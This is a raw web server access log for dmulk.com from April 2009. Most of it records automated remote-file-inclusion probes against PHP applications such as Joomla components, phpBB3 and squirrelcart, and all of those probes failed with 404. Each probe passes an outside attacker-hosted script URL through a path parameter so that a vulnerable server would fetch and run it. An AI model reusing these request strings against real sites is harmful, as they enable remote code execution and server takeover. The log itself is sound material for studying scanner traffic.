217.8.248.158 - - [02/Apr/2009:09:54:25 -0700] "GET /logs/access_081002.log//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.8.248.158 - - [02/Apr/2009:09:54:25 -0700] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.8.248.158 - - [02/Apr/2009:09:54:25 -0700] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.58.137.172 - - [02/Apr/2009:09:54:38 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.58.137.172 - - [02/Apr/2009:09:54:38 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.58.137.172 - - [02/Apr/2009:09:54:38 -0700] "GET /logs/access_090308.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.142.82 - - [02/Apr/2009:09:54:42 -0700] "GET /blog/index.php/2008/04/ HTTP/1.0" 200 13178 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
207.58.137.172 - - [02/Apr/2009:09:54:49 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:55:19 -0700] "GET /logs//administrator/components/com_virtuemart/COPYRIGHT.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:55:19 -0700] "GET /logs/access_080905.log//administrator/components/com_virtuemart/COPYRIGHT.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:55:19 -0700] "GET /administrator/components/com_virtuemart/COPYRIGHT.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:09:55:19 -0700] "GET /logs/access_080503.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:09:55:19 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:09:55:19 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.142.82 - - [02/Apr/2009:09:55:24 -0700] "GET /blog/index.php/2008/04/ HTTP/1.0" 200 13178 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
62.44.79.35 - - [02/Apr/2009:09:55:36 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [02/Apr/2009:09:55:36 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:09:55:40 -0700] "GET /logs/access_080602.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.44.79.35 - - [02/Apr/2009:09:55:41 -0700] "GET /logs/access_090308.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [02/Apr/2009:09:55:51 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.142.82 - - [02/Apr/2009:09:56:00 -0700] "GET /blog/index.php/2008/04/ HTTP/1.0" 200 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
202.58.65.23 - - [02/Apr/2009:09:56:02 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.58.65.23 - - [02/Apr/2009:09:56:02 -0700] "GET /logs/access_080616.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.58.65.23 - - [02/Apr/2009:09:56:05 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.142.82 - - [02/Apr/2009:09:56:21 -0700] "GET /blog/index.php/2008/04/ HTTP/1.0" 200 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
207.58.137.172 - - [02/Apr/2009:09:56:37 -0700] "GET /logs/access_090308.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.73.2 - - [02/Apr/2009:09:56:39 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rvc.de/images/Albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [02/Apr/2009:09:56:40 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rvc.de/images/Albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.137.172 - - [02/Apr/2009:09:56:41 -0700] "GET /logs/access_080407.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:56:52 -0700] "GET /logs/access_080808.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:57:00 -0700] "GET /logs/access_080616.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.58.65.23 - - [02/Apr/2009:09:57:06 -0700] "GET /logs/access_080621.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.73.2 - - [02/Apr/2009:09:57:26 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rvc.de/images/Albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [02/Apr/2009:09:57:34 -0700] "GET /logs/access_080509.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rvc.de/images/Albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:57:36 -0700] "GET /logs/access_080621.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:57:52 -0700] "GET /logs/access_080514.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:57:55 -0700] "GET /logs/access_080831.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:58:08 -0700] "GET /logs/access_081026.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.17 - - [02/Apr/2009:09:58:24 -0700] "GET /logs//index1.php?page=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.17 - - [02/Apr/2009:09:58:24 -0700] "GET /logs/access_080409.log//index1.php?page=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.17 - - [02/Apr/2009:09:58:25 -0700] "GET /index1.php?page=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.65.1.253 - - [02/Apr/2009:09:58:26 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.65.1.253 - - [02/Apr/2009:09:58:26 -0700] "GET /logs/access_080618.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.65.1.253 - - [02/Apr/2009:09:58:26 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.17 - - [02/Apr/2009:09:58:28 -0700] "GET /logs/access_081011.log//index1.php?page=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.33.230 - - [02/Apr/2009:09:58:33 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [02/Apr/2009:09:58:33 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [02/Apr/2009:09:58:33 -0700] "GET /logs/access_080519.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [02/Apr/2009:09:58:37 -0700] "GET /logs/access_080327.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [02/Apr/2009:09:58:42 -0700] "GET /logs/access_080529.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.17.169 - - [02/Apr/2009:09:58:48 -0700] "GET /bikes/dteel/2008_02_07/ HTTP/1.0" 200 2521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.209.247.35 - - [02/Apr/2009:09:59:04 -0700] "GET /logs/access_090308.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.209.247.35 - - [02/Apr/2009:09:59:04 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.209.247.35 - - [02/Apr/2009:09:59:04 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.209.247.35 - - [02/Apr/2009:09:59:17 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.237.184.86 - - [02/Apr/2009:09:59:18 -0700] "GET /logs//galeria.php?start=0&kategoria=http://spk-wellness.de/smile.gif? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
80.237.184.86 - - [02/Apr/2009:09:59:18 -0700] "GET /galeria.php?start=0&kategoria=http://spk-wellness.de/smile.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:59:21 -0700] "GET /logs/access_080811.log//administrator/components/com_virtuemart/COPYRIGHT.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.97.10.114 - - [02/Apr/2009:10:00:02 -0700] "GET /logs/access_080414.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cheersclan.de/html/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.97.10.114 - - [02/Apr/2009:10:00:06 -0700] "GET /logs/access_080427.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cheersclan.de/html/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:00:21 -0700] "GET /logs/access_080905.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:00:21 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:00:21 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.170.122.72 - - [02/Apr/2009:10:00:46 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.peacemovers.com/media/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.170.122.72 - - [02/Apr/2009:10:00:46 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.peacemovers.com/media/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.209.247.35 - - [02/Apr/2009:10:01:11 -0700] "GET /logs/access_090308.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.104.37.122 - - [02/Apr/2009:10:01:12 -0700] "GET /logs/access_081002.log//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
216.104.37.122 - - [02/Apr/2009:10:01:12 -0700] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
216.104.37.122 - - [02/Apr/2009:10:01:12 -0700] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
61.209.247.35 - - [02/Apr/2009:10:01:17 -0700] "GET /logs/access_080407.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [02/Apr/2009:10:01:22 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [02/Apr/2009:10:01:22 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [02/Apr/2009:10:01:22 -0700] "GET /logs/access_080503.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [02/Apr/2009:10:01:37 -0700] "GET /logs/access_080602.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:02:00 -0700] "GET /logs/access_080621.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:02:00 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:02:00 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:02:02 -0700] "GET /logs/access_080519.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:02:02 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:02:06 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.170.122.72 - - [02/Apr/2009:10:02:17 -0700] "GET /logs/access_090125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.peacemovers.com/media/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:02:29 -0700] "GET /logs/access_080905.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.65.1.253 - - [02/Apr/2009:10:02:32 -0700] "GET /logs/access_080618.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [02/Apr/2009:10:02:35 -0700] "GET /logs/access_080503.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:02:48 -0700] "GET /logs/access_080905.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:02:48 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:02:48 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:03:11 -0700] "GET /logs/access_080811.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.170.122.72 - - [02/Apr/2009:10:03:29 -0700] "GET /logs/access_080511.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.peacemovers.com/media/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:03:42 -0700] "GET /logs/access_080905.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:03:53 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:03:53 -0700] "GET /logs/access_080616.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.17 - - [02/Apr/2009:10:03:54 -0700] "GET /logs/access_080708.log%20//index1.php?page=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:03:56 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:03:59 -0700] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:03:59 -0700] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:03:59 -0700] "GET /logs/access_081201.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:04:06 -0700] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:04:07 -0700] "GET /logs/access_081201.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:04:07 -0700] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:04:08 -0700] "GET /logs/access_080617.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:04:10 -0700] "GET /logs/access_081016.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:04:20 -0700] "GET /logs/access_081016.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:04:43 -0700] "GET /logs/access_080519.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
